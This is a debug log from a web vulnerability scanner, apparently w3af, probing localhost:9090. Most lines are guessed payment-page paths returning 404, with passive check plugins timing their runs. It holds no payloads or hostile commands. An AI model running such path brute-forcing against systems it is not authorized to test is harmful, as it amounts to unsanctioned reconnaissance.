(id=2526,from_cache=0,grep=1,rtt=0.13,did=DiZii51E) [Wed Feb 12 09:41:01 2020 - debug] POST http://localhost:9090/inc/paymentsuccessful.asp returned HTTP code "404" (id=2513,from_cache=0,grep=1,rtt=0.21,did=6atup7rk) [Wed Feb 12 09:41:01 2020 - debug] POST http://localhost:9090/libraries/valid.cgi returned HTTP code "404" (id=2517,from_cache=0,grep=1,rtt=0.06,did=GotanQOS) [Wed Feb 12 09:41:01 2020 - debug] GET http://localhost:9090/inc/complete.py returned HTTP code "404" (id=2512,from_cache=0,grep=1,rtt=0.11,did=9txJ1XxX) [Wed Feb 12 09:41:01 2020 - debug] POST http://localhost:9090/includes/validate.cgi returned HTTP code "404" (id=2521,from_cache=0,grep=1,rtt=0.29,did=ah8w39LU) [Wed Feb 12 09:41:01 2020 - debug] serialized_object.grep(uri="http://localhost:9090/localhost.bzip2") took 0.16s to run [Wed Feb 12 09:41:01 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:41:01 2020 - debug] objects.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:41:01 2020 - debug] error_500.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:41:02 2020 - debug] meta_tags.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:41:02 2020 - debug] password_profiling.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:41:02 2020 - debug] click_jacking.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:41:02 2020 - debug] POST http://localhost:9090/includes/validatepay.php5 returned HTTP code "404" (id=2530,from_cache=0,grep=1,rtt=0.15,did=YExpO5RZ) [Wed Feb 12 09:41:02 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:41:02 2020 - debug] GET http://localhost:9090/module/success.php4 returned HTTP code "404" (id=2508,from_cache=0,grep=1,rtt=0.09,did=NKGQYKFr) [Wed Feb 12 09:41:02 2020 - debug] POST http://localhost:9090/inc/completepay.php returned HTTP code "404" (id=2527,from_cache=0,grep=1,rtt=0.03,did=EqwNcVnd) [Wed Feb 12 09:41:02 2020 - debug] POST http://localhost:9090/servlet/paymentsuccessful.php returned HTTP code "404" (id=2532,from_cache=0,grep=1,rtt=0.25,did=INyEl8pW) [Wed Feb 12 09:41:03 2020 - debug] POST http://localhost:9090/modules/transactioncomplete.cgi returned HTTP code "404" (id=2500,from_cache=0,grep=1,rtt=0.11,did=WinlOcWf) [Wed Feb 12 09:41:03 2020 - debug] GET http://localhost:9090/module/finished.asp returned HTTP code "404" (id=2524,from_cache=0,grep=1,rtt=0.28,did=Fwhu2b54) [Wed Feb 12 09:41:03 2020 - debug] lang.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:41:03 2020 - debug] POST http://localhost:9090/includes/final returned HTTP code "404" (id=2529,from_cache=0,grep=1,rtt=0.10,did=2Z00NVWr) [Wed Feb 12 09:41:03 2020 - debug] POST http://localhost:9090/servlet/successful.php returned HTTP code "404" (id=2528,from_cache=0,grep=1,rtt=0.17,did=dw4FFiK1) [Wed Feb 12 09:41:03 2020 - debug] POST http://localhost:9090/servlet/final.rb returned HTTP code "404" (id=2520,from_cache=0,grep=1,rtt=0.12,did=fmbv6Azc) [Wed Feb 12 09:41:03 2020 - debug] GET http://localhost:9090/includes/completepay.asp returned HTTP code "404" (id=2525,from_cache=0,grep=1,rtt=0.06,did=sWdOTr79) [Wed Feb 12 09:41:03 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/localhost.bzip2") took 0.09s to run [Wed Feb 12 09:41:03 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:41:03 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/localhost.bzip2") took 0.50s to run [Wed Feb 12 09:41:03 2020 - debug] strange_reason.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:41:03 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:41:03 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:41:03 2020 - debug] cache_control.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:41:03 2020 - debug] strange_headers.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:41:03 2020 - debug] ssn.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:41:03 2020 - debug] oracle.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:41:03 2020 - debug] feeds.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:41:03 2020 - debug] html_comments.grep(uri="http://localhost:9090/localhost.bzip2") took 0.52s to run [Wed Feb 12 09:41:03 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/localhost.bzip2") took 0.52s to run [Wed Feb 12 09:41:03 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/localhost.bzip2") took 0.53s to run [Wed Feb 12 09:41:03 2020 - debug] http_in_body.grep(uri="http://localhost:9090/localhost.bzip2") took 0.55s to run [Wed Feb 12 09:41:03 2020 - debug] url_session.grep(uri="http://localhost:9090/localhost.bzip2") took 0.37s to run [Wed Feb 12 09:41:03 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/localhost.bzip2") took 0.47s to run [Wed Feb 12 09:41:03 2020 - debug] POST http://localhost:9090/includes/complete.php returned HTTP code "404" (id=2534,from_cache=0,grep=1,rtt=0.16,did=GgWpICtY) [Wed Feb 12 09:41:03 2020 - debug] GET http://localhost:9090/module/transactioncomplete returned HTTP code "404" (id=2535,from_cache=0,grep=1,rtt=0.14,did=ZIE3AjE4) [Wed Feb 12 09:41:04 2020 - debug] POST http://localhost:9090/libraries/validatepayment.asp returned HTTP code "404" (id=2536,from_cache=0,grep=1,rtt=0.32,did=OiXwL2Zf) [Wed Feb 12 09:41:04 2020 - debug] GET http://www.google.com/xhtml?q=site:localhost intitle:Linksys site:ourlinksys.com&start=0 returned HTTP code "429" (id=2533,from_cache=0,grep=1,rtt=0.48,did=YeFwCByf) [Wed Feb 12 09:41:04 2020 - debug] Google is telling us to stop doing automated tests. [Wed Feb 12 09:41:04 2020 - debug] GET http://localhost:9090/includes/trxcomplete.php returned HTTP code "404" (id=2537,from_cache=0,grep=1,rtt=0.02,did=IH6gT38C) [Wed Feb 12 09:41:04 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 145. [Wed Feb 12 09:41:04 2020 - debug] POST http://localhost:9090/servlet/payment.asp returned HTTP code "404" (id=2538,from_cache=0,grep=1,rtt=0.09,did=ohR8mxSe) [Wed Feb 12 09:41:04 2020 - debug] error_pages.grep(uri="http://localhost:9090/localhost.bzip2") took 0.28s to run [Wed Feb 12 09:41:04 2020 - debug] localhost:9090 connection pool stats (free:47 / in_use:7 / max:50 / total:54) [Wed Feb 12 09:41:04 2020 - debug] Connections with more in use time: (feefb3b1646a9d56, 0.15 sec) (20c6fb7a85d275d0, 0.13 sec) (51c120544df55e56, 0.11 sec) (62e87e81607155f6, 0.07 sec) (084f56a9dda1c119, 0.06 sec) [Wed Feb 12 09:41:04 2020 - debug] POST http://localhost:9090/module/success.php5 returned HTTP code "404" (id=2540,from_cache=0,grep=1,rtt=0.20,did=nDThiyyT) [Wed Feb 12 09:41:04 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/localhost.bzip2") took 0.40s to run [Wed Feb 12 09:41:04 2020 - debug] POST http://localhost:9090/module/validatepayment.asp returned HTTP code "404" (id=2539,from_cache=0,grep=1,rtt=0.06,did=M7NwZVas) [Wed Feb 12 09:41:04 2020 - debug] POST http://localhost:9090/inc/validate.php5 returned HTTP code "404" (id=2541,from_cache=0,grep=1,rtt=0.08,did=SAim8Cyy) [Wed Feb 12 09:41:05 2020 - debug] POST http://localhost:9090/inc/final.aspx returned HTTP code "404" (id=2542,from_cache=0,grep=1,rtt=0.14,did=H0Ez9LhQ) [Wed Feb 12 09:41:05 2020 - debug] get_emails.grep(uri="http://localhost:9090/localhost.7z") took 2.09s to run [Wed Feb 12 09:41:07 2020 - debug] GET http://localhost:9090/module/valid.php4 returned HTTP code "404" (id=2549,from_cache=0,grep=1,rtt=0.27,did=rBryouAY) [Wed Feb 12 09:41:07 2020 - debug] POST http://localhost:9090/module/transactioncomplete.cgi returned HTTP code "404" (id=2547,from_cache=0,grep=1,rtt=0.35,did=yKDoXRIf) [Wed Feb 12 09:41:07 2020 - debug] GET http://localhost:9090/modules/payment.php returned HTTP code "404" (id=2544,from_cache=0,grep=1,rtt=0.08,did=snkqJHKu) [Wed Feb 12 09:41:07 2020 - debug] GET http://localhost:9090/inc/completepay.php returned HTTP code "404" (id=2548,from_cache=0,grep=1,rtt=0.31,did=V8Puo5DV) [Wed Feb 12 09:41:07 2020 - debug] GET http://localhost:9090/modules/completepayment.php returned HTTP code "404" (id=2550,from_cache=0,grep=1,rtt=0.23,did=5B3HYbPT) [Wed Feb 12 09:41:07 2020 - debug] POST http://localhost:9090/includes/completepay.py returned HTTP code "404" (id=2551,from_cache=0,grep=1,rtt=0.11,did=fEoLIuG7) [Wed Feb 12 09:41:07 2020 - debug] GET http://localhost:9090/modules/pay.php4 returned HTTP code "404" (id=2546,from_cache=0,grep=1,rtt=0.17,did=uPP0DVgB) [Wed Feb 12 09:41:07 2020 - debug] GET http://localhost:9090/module/validation returned HTTP code "404" (id=2404,from_cache=0,grep=1,rtt=0.01,did=IwrKyRJX) [Wed Feb 12 09:41:07 2020 - debug] GET http://localhost:9090/modules/transactioncomplete.cgi returned HTTP code "404" (id=2554,from_cache=0,grep=1,rtt=0.07,did=7Ky9yLLC) [Wed Feb 12 09:41:08 2020 - debug] GET http://localhost:9090/servlet/final.rb returned HTTP code "404" (id=2555,from_cache=0,grep=1,rtt=0.18,did=LLbxz1P0) [Wed Feb 12 09:41:08 2020 - debug] GET http://localhost:9090/inc/paymentsuccessful.asp returned HTTP code "404" (id=2553,from_cache=0,grep=1,rtt=0.36,did=AUjSDPu7) [Wed Feb 12 09:41:08 2020 - debug] GET http://localhost:9090/includes/validate.cgi returned HTTP code "404" (id=2552,from_cache=0,grep=1,rtt=0.17,did=b7zOj8aX) [Wed Feb 12 09:41:08 2020 - debug] POST http://localhost:9090/servlet/pay.py returned HTTP code "404" (id=2545,from_cache=0,grep=1,rtt=0.39,did=FdJWdwKv) [Wed Feb 12 09:41:08 2020 - debug] POST http://localhost:9090/module/finished.py returned HTTP code "404" (id=2543,from_cache=0,grep=1,rtt=0.19,did=1WSPGrNx) [Wed Feb 12 09:41:08 2020 - debug] symfony.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:08 2020 - debug] file_upload.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:08 2020 - debug] motw.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:08 2020 - debug] meta_generator.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:08 2020 - debug] retirejs.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:08 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:08 2020 - debug] expect_ct.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:08 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:41:08 2020 - debug] serialized_object.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:08 2020 - debug] blank_body.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:08 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:08 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:08 2020 - debug] credit_cards.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:08 2020 - debug] websockets_links.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:08 2020 - debug] POST http://localhost:9090/modules/validpay.asp returned HTTP code "404" (id=2557,from_cache=0,grep=1,rtt=0.54,did=GmZjoFJV) [Wed Feb 12 09:41:08 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1137, 'reject-seen-url': 974, 'reject-out-of-scope': 28, 'accept': 211} [Wed Feb 12 09:41:09 2020 - debug] GET http://localhost:9090/includes/validatepay.php5 returned HTTP code "404" (id=2558,from_cache=0,grep=1,rtt=0.27,did=Siz92enW) [Wed Feb 12 09:41:09 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1137, 'reject-seen-url': 974, 'reject-out-of-scope': 28, 'accept': 211} [Wed Feb 12 09:41:09 2020 - debug] POST http://localhost:9090/inc/complete.jsp returned HTTP code "404" (id=2559,from_cache=0,grep=1,rtt=0.42,did=Yp060YRv) [Wed Feb 12 09:41:09 2020 - debug] private_ip.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:09 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:09 2020 - debug] csp.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:09 2020 - debug] svn_users.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:09 2020 - debug] GET http://localhost:9090/libraries/valid.cgi returned HTTP code "404" (id=2560,from_cache=0,grep=1,rtt=0.30,did=CgBumHge) [Wed Feb 12 09:41:09 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:09 2020 - debug] clamav.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:09 2020 - debug] GET http://localhost:9090/servlet/paymentsuccessful.php returned HTTP code "404" (id=2556,from_cache=0,grep=1,rtt=0.17,did=0McvJRWQ) [Wed Feb 12 09:41:09 2020 - debug] localhost:9090 connection pool stats (free:51 / in_use:3 / max:50 / total:54) [Wed Feb 12 09:41:09 2020 - debug] Connections with more in use time: (feefb3b1646a9d56, 0.42 sec) (ff9acc2bc4ba5606, 0.31 sec) [Wed Feb 12 09:41:09 2020 - debug] POST http://localhost:9090/includes/trxcomplete.aspx returned HTTP code "404" (id=2561,from_cache=0,grep=1,rtt=0.41,did=Jx1J66B7) [Wed Feb 12 09:41:09 2020 - debug] vulners_db.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:09 2020 - debug] GET http://localhost:9090/servlet/successful.php returned HTTP code "404" (id=2564,from_cache=0,grep=1,rtt=0.24,did=AZGq0ETA) [Wed Feb 12 09:41:10 2020 - debug] GET http://localhost:9090/includes/complete.php returned HTTP code "404" (id=2565,from_cache=0,grep=1,rtt=0.04,did=ZSYsl8Ly) [Wed Feb 12 09:41:10 2020 - debug] GET http://localhost:9090/includes/final returned HTTP code "404" (id=2563,from_cache=0,grep=1,rtt=0.42,did=TDSbRK5z) [Wed Feb 12 09:41:10 2020 - debug] POST http://localhost:9090/modules/completepayment.aspx returned HTTP code "404" (id=2567,from_cache=0,grep=1,rtt=0.27,did=YYVQhOaN) [Wed Feb 12 09:41:10 2020 - debug] GET http://localhost:9090/inc/validate.php5 returned HTTP code "404" (id=2570,from_cache=0,grep=1,rtt=0.13,did=br354uzW) [Wed Feb 12 09:41:10 2020 - debug] POST http://localhost:9090/modules/pay.php5 returned HTTP code "404" (id=2566,from_cache=0,grep=1,rtt=0.12,did=cQCiZmLZ) [Wed Feb 12 09:41:10 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/localhost.zip") took 0.29s to run [Wed Feb 12 09:41:10 2020 - debug] GET http://localhost:9090/inc/final.aspx returned HTTP code "404" (id=2577,from_cache=0,grep=1,rtt=0.13,did=aIZjEfp8) [Wed Feb 12 09:41:10 2020 - debug] http_in_body.grep(uri="http://localhost:9090/localhost.zip") took 0.51s to run [Wed Feb 12 09:41:10 2020 - debug] dom_xss.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:10 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:10 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:10 2020 - debug] error_500.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:10 2020 - debug] meta_tags.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:10 2020 - debug] password_profiling.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:10 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/localhost.zip") took 0.50s to run [Wed Feb 12 09:41:10 2020 - debug] click_jacking.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:10 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:10 2020 - debug] lang.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:10 2020 - debug] POST http://localhost:9090/module/validation.cgi returned HTTP code "404" (id=2571,from_cache=0,grep=1,rtt=0.06,did=haghcKX2) [Wed Feb 12 09:41:10 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:10 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:10 2020 - debug] keys.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:10 2020 - debug] strange_reason.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:10 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:10 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:10 2020 - debug] cache_control.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:10 2020 - debug] GET http://localhost:9090/libraries/validatepayment.asp returned HTTP code "404" (id=2562,from_cache=0,grep=1,rtt=0.36,did=Mdg4SolT) [Wed Feb 12 09:41:10 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 144. [Wed Feb 12 09:41:11 2020 - debug] POST http://localhost:9090/modules/transactioncomplete.asp returned HTTP code "404" (id=2578,from_cache=0,grep=1,rtt=0.10,did=4WaNJzrv) [Wed Feb 12 09:41:11 2020 - debug] GET http://localhost:9090/servlet/pay.py returned HTTP code "404" (id=2579,from_cache=0,grep=1,rtt=0.20,did=MAZvIV9y) [Wed Feb 12 09:41:11 2020 - debug] GET http://localhost:9090/servlet/payment.asp returned HTTP code "404" (id=2568,from_cache=0,grep=1,rtt=0.04,did=prdtbraY) [Wed Feb 12 09:41:11 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/localhost.zip") took 0.08s to run [Wed Feb 12 09:41:11 2020 - debug] oracle.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:11 2020 - debug] feeds.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:11 2020 - debug] strange_headers.grep(uri="http://localhost:9090/localhost.zip") took 0.05s to run [Wed Feb 12 09:41:11 2020 - debug] ssn.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:11 2020 - debug] html_comments.grep(uri="http://localhost:9090/localhost.zip") took 0.20s to run [Wed Feb 12 09:41:11 2020 - debug] POST http://localhost:9090/servlet/final.php4 returned HTTP code "404" (id=2575,from_cache=0,grep=1,rtt=0.22,did=rAYV3xi1) [Wed Feb 12 09:41:11 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/localhost.zip") took 0.23s to run [Wed Feb 12 09:41:11 2020 - debug] POST http://localhost:9090/includes/validate.asp returned HTTP code "404" (id=2576,from_cache=0,grep=1,rtt=0.19,did=1sssNsRj) [Wed Feb 12 09:41:11 2020 - debug] POST http://localhost:9090/includes/validatepay.php returned HTTP code "404" (id=2573,from_cache=0,grep=1,rtt=0.13,did=4oNsBvDz) [Wed Feb 12 09:41:11 2020 - debug] GET http://localhost:9090/module/validatepayment.asp returned HTTP code "404" (id=2569,from_cache=0,grep=1,rtt=0.12,did=TVuDXyWJ) [Wed Feb 12 09:41:11 2020 - debug] error_pages.grep(uri="http://localhost:9090/localhost.zip") took 0.06s to run [Wed Feb 12 09:41:11 2020 - debug] objects.grep(uri="http://localhost:9090/localhost.zip") took 0.00s to run [Wed Feb 12 09:41:11 2020 - debug] POST http://localhost:9090/libraries/valid.asp returned HTTP code "404" (id=2583,from_cache=0,grep=1,rtt=0.27,did=NZpEV5m2) [Wed Feb 12 09:41:11 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/localhost.zip") took 0.04s to run [Wed Feb 12 09:41:11 2020 - debug] GET http://localhost:9090/module/success.php5 returned HTTP code "404" (id=2582,from_cache=0,grep=1,rtt=0.34,did=mo0WFer2) [Wed Feb 12 09:41:11 2020 - debug] url_session.grep(uri="http://localhost:9090/localhost.zip") took 0.08s to run [Wed Feb 12 09:41:11 2020 - debug] GET http://localhost:9090/module/transactioncomplete.cgi returned HTTP code "404" (id=2581,from_cache=0,grep=1,rtt=0.28,did=l0bFMnnf) [Wed Feb 12 09:41:11 2020 - debug] POST http://localhost:9090/inc/paymentsuccessful.py returned HTTP code "404" (id=2585,from_cache=0,grep=1,rtt=0.19,did=cbELuA2Q) [Wed Feb 12 09:41:11 2020 - debug] Increased the worker pool size to 34 (error rate: 0%) [Wed Feb 12 09:41:11 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:11 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:11 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:11 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:11 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:11 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:11 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:11 2020 - debug] POST http://localhost:9090/module/valid.php5 returned HTTP code "404" (id=2572,from_cache=0,grep=1,rtt=0.13,did=kzhBnRgW) [Wed Feb 12 09:41:11 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1148, 'reject-seen-url': 988, 'reject-out-of-scope': 28, 'accept': 211} [Wed Feb 12 09:41:11 2020 - debug] get_emails.grep(uri="http://localhost:9090/localhost.bzip2") took 2.06s to run [Wed Feb 12 09:41:12 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:12 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:12 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:12 2020 - debug] POST http://localhost:9090/modules/payment.aspx returned HTTP code "404" (id=2587,from_cache=0,grep=1,rtt=0.53,did=SikZycew) [Wed Feb 12 09:41:12 2020 - debug] GET http://localhost:9090/module/finished.py returned HTTP code "404" (id=2580,from_cache=0,grep=1,rtt=0.19,did=28R87JtI) [Wed Feb 12 09:41:12 2020 - debug] GET http://localhost:9090/inc/complete.jsp returned HTTP code "404" (id=2584,from_cache=0,grep=1,rtt=0.09,did=urH2Lg8b) [Wed Feb 12 09:41:12 2020 - debug] GET http://localhost:9090/includes/completepay.py returned HTTP code "404" (id=2586,from_cache=0,grep=1,rtt=0.34,did=hZBnkVw9) [Wed Feb 12 09:41:12 2020 - debug] localhost:9090 connection pool stats (free:47 / in_use:7 / max:50 / total:54) [Wed Feb 12 09:41:12 2020 - debug] Connections with more in use time: (20c6fb7a85d275d0, 0.24 sec) (a5419411797e137e, 0.21 sec) (51c120544df55e56, 0.10 sec) (feefb3b1646a9d56, 0.08 sec) (084f56a9dda1c119, 0.05 sec) [Wed Feb 12 09:41:12 2020 - debug] POST http://localhost:9090/inc/completepay.aspx returned HTTP code "404" (id=2574,from_cache=0,grep=1,rtt=0.10,did=UazK3rDq) [Wed Feb 12 09:41:12 2020 - debug] GET http://localhost:9090/modules/validpay.asp returned HTTP code "404" (id=2588,from_cache=0,grep=1,rtt=0.27,did=8xMzEiCG) [Wed Feb 12 09:41:12 2020 - debug] POST http://localhost:9090/inc/validate.php returned HTTP code "404" (id=2591,from_cache=0,grep=1,rtt=0.29,did=SAoY15Wr) [Wed Feb 12 09:41:13 2020 - debug] POST http://localhost:9090/includes/final.cgi returned HTTP code "404" (id=2592,from_cache=0,grep=1,rtt=0.09,did=v1F56ywx) [Wed Feb 12 09:41:15 2020 - debug] GET http://localhost:9090/servlet/paymentsuccess.jsp returned HTTP code "404" (id=2405,from_cache=0,grep=1,rtt=0.16,did=6q1P004K) [Wed Feb 12 09:41:15 2020 - debug] POST http://localhost:9090/includes/complete.aspx returned HTTP code "404" (id=2590,from_cache=0,grep=1,rtt=0.12,did=KuTfJEqA) [Wed Feb 12 09:41:15 2020 - debug] symfony.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] motw.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] meta_generator.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] retirejs.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] file_upload.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:41:15 2020 - debug] serialized_object.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] blank_body.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] credit_cards.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] websockets_links.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] expect_ct.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] dom_xss.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] vulners_db.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] keys.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] svn_users.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] clamav.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] private_ip.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] objects.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] error_500.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] meta_tags.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] password_profiling.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] click_jacking.grep(uri="http://localhost:9090/localhost.rar") took 0.00s to run [Wed Feb 12 09:41:15 2020 - debug] POST http://localhost:9090/servlet/successful.aspx returned HTTP code "404" 